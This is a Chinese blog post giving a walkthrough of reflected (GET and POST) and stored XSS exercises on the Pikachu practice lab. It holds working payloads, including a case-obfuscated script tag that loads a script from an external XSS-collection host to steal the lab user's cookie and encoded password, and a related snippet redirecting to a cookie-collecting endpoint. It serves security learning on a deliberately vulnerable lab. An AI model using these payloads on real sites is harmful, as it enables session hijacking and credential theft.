pikachu反射型xss(get、post)、储存型xss

已于 2022-09-14 19:10:02 修改
阅读量951 收藏 1
点赞数
分类专栏: pikachu学习 Web学习 文章标签: xss javascript 前端
于 2022-09-05 21:16:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Resets_/article/details/126713672
版权

pikachu

反射型xss(get)

在message后输入

<a href="javascript:alert(1)">XSS Test</a>

即可在who is后面看到按钮:XSS Test,点击即可显示出alert的内容1;

反射型xss(post)

界面是输入用户名和密码,尝试将这两栏输入JavaScript弹窗命令,不论是只输入一个表单,还是两个都输入,都没有产生反应,按提示登录后,再尝试提交js的弹窗命令:

image-20220905193244370

发现了提交的request中有cookie,message依然是urlencode的js弹窗命令:image-20220905193420545

这次post提交就可以看到提交后可以看到弹框命令可以执行了:

image-20220905193729654

在XSS平台中截取下图黄色部分代码提交post请求,代码:

<sCRiPt sRC=//uj.ci/pl5C></sCrIpT>

image-20220905194946585

查看项目内容也一样得到cookie,cookie中的admin以及pw后的urlencode编码的密码就可以被盗取:

image-20220905195212291

储存型xss

提交js命令后依然可以弹出命令

储存型xss

提交js命令后依然可以弹出命令

image-20220905202606272

Resets_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞利用---GETXSS漏洞获取用户Cookie信息
Ethan024的博客
03-07 1138
** XSS漏洞利用(本文仅供技术学习与分享) ** GETXSS漏洞获取用户Cookie信息 我们都知道XSS漏洞可以让浏览器弹框,但是不知道有什么实际的危害。下面我用皮卡丘靶场来做实验。 实验准备 皮卡丘平台为存在XSS漏洞平台的站点; 用户正常访问该站点; 攻击者搭建的,以供收集数据的后台(皮卡丘后台预备好了pkxss平台); 实验思路 攻击者在pkxss后台创建一个接收数据的接口; 攻击者在存在XSS漏洞的站点上插入恶意脚本; 正常的用户访问XSS页面,触发脚本;站点随即返回恶意JS的页面给
Pikachu靶场:反射XSS(post)
witwitwiter的博客
04-07 3824
Pikachu靶场:反射XSS(post) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●反射 交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。 跨站脚本漏洞测试流程 1.在目标站点上找到输入点,比如查询接口,留言板等; 2.输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回
前端网络安全(一):XSS
qq_53058639的博客
02-08 1009
原本的简称应该是CSS,但是为了和层叠样式表CSS区分,故而改称为XSSXSS攻击一般是指黑客通过 HTML注入篡改了页面,插入恶意的脚本,从而在用户浏览网页的时候,控制用户浏览器的一种攻击。针对各种不同场景产生的各种XSS,我们则需要区分情景对待。
pikachu靶场XSS漏洞通关
最新发布
Zqinglele的博客
04-19 1893
存储是将攻击者在留言板等输入框中输入的恶意代码直接存入数据库中,由于数据库不识别js代码,一旦有用户打开存有恶意代码的网页界面,那么恶意代码就会被从数据库中读出,是一类危害最大的xss攻击。dom又称self-xss,攻击者利用dom节点的结构在网页中插入一段恶意代码,这段代码被简单处理或未处理后又在网页中的一个位置显示出来,攻击过程中所有恶意代码均在前端执行。在用户点击被攻击者插入恶意代码的网页链接后,恶意代码在被攻击者的网页中被执行。尝试插入payload,发现是有长度限制,不能把这句完整插入。
Pikachu靶场入门之反射、存储XSS
qq_45754781的博客
06-03 1159
XSS入门之Pikachu反射、存储XSS靶场
pikachu靶场XSS学习
quan9i的博客
04-11 1918
反射XSS(get)存储XSSDOMXSSDOMXSS -Xxss盲打xss之过滤方法二XSS之htmlspecialcharsXSS之href输出XSS之js输出
get方式的xss漏洞利用
qq_43814486的博客
04-15 2626
原理:后端没有对信息的输入和输出进行处理。提交信息(精心构造的payload)后,页面实质是把信息通过URL传到后台,也就是说,每一次通过浏览器进行这个URL访问的时候都会执行我们刚刚提交的信息(精心构造的payload)大致过程如图: 插一个小知识:通过前端对输入框进行限制其实是没用的,可以通过查看前端的代码找到对应的代码进行修改,如图: ...
pikachu-xss.txt
06-10
pikachu-xss
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
sql和xss等靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
pikachu靶场包含网络安全中常见的漏洞
11-08
Pikachu靶场中,你可以学习如何检测XSS漏洞,理解反射、存储和DOMXSS的区别,并掌握防御策略,如输入过滤、输出编码等。 2. **SQL注入**:SQL注入是攻击者通过输入恶意的SQL语句来获取、修改、删除数据库...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
xss反射post_XSS 跨站脚本攻击漏洞详解(反射xss+储存xss
weixin_42349126的博客
01-31 2161
XSS(Cross Site Scripting)简介:XSS 跨站脚本攻击(Cross Site Scripting),为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分作用叫XSS.反射XSS的入侵过程:攻击者将含有恶意JavaScript代码的URL发给用户==>用户打开URL==>web应用程序对攻击者的JavaScript做出回应...
【WEB漏洞】第三章 XSS(一)
人间体佐菲的博客
09-13 566
XSS漏洞攻击描述
Pikachu靶场之XSS漏洞详解
热门推荐
m0_46467017的博客
05-13 1万+
Pikachu靶场之XSS漏洞详解前言XSS漏洞简述第1关 反射xss(get)第2关 反射xss(post)第3关 存储xss第4关 DOMxss第5关 DOMxss-x第6关 xss盲打第7关 xss之过滤第8关 xss之htmlspecialchars第9关 xss之href输出第10关 xss之js输出 前言 本篇文章用于巩固对自己xss漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu XSS Cross-Site Scripting皮卡丘漏洞平台通关系列 链接: P
pikachu靶场之反射XSS(cookie盗取)
weixin_45705209的博客
08-20 1939
反射XSS 尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。 利用漏洞获取cookie实例操作 这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
pikachuxss漏洞学习
weixin_38720471的博客
01-24 1951
1简介 XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制 攻击流程# 假设存在漏洞的是一个论坛,攻击者将恶意的JS代码通过XSS漏洞插入到论文的某一页面中 当用户访问这个页面时,都会执行这个恶意的JS代码,这个代码就会在用户的浏览器端执行 XSS攻击类# 危害:存储 > 反射 > DOM 反射:交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存
[ pikachu ] 靶场通关之 XSS (三) --- 存储 XSS
qq_51577576的博客
01-14 2629
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、存储 XSS 二、过关: 1. 页面展示 2. 判断是否存在 XSS
pikachu靶场之反射GET方法
m0_52663093的博客
11-20 2547
一 什么是用户枚举漏洞 用户枚举漏洞就是指枚举猜测用户名,但不能生成有效用户名列表。这个漏洞之所以存在,是因为服务器在对消息完整解析之前,用户查询了不存在的用户名,所以产生用户枚举漏洞 二 影响的版本 OpenSSH >=2.3&&<=7.7 三漏洞复现 首先打开kali虚拟机 然后打开open ssh 的CVE-2018-15473 输入命令docker-compose up -d 然后等待docker环境 如图所示。 环境启动后,我们在客户端执行ssh -o.
pikachu靶场domxss
08-16
Pikachu靶场是一个用于漏洞测试的平台,而DOMXSS(跨站脚本攻击)是一种利用网页中的DOM(文档对象模)进行攻击的方式。在DOMXSS攻击中,攻击者通过注入恶意脚本来篡改网页的行为,使其执行攻击者预期的操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值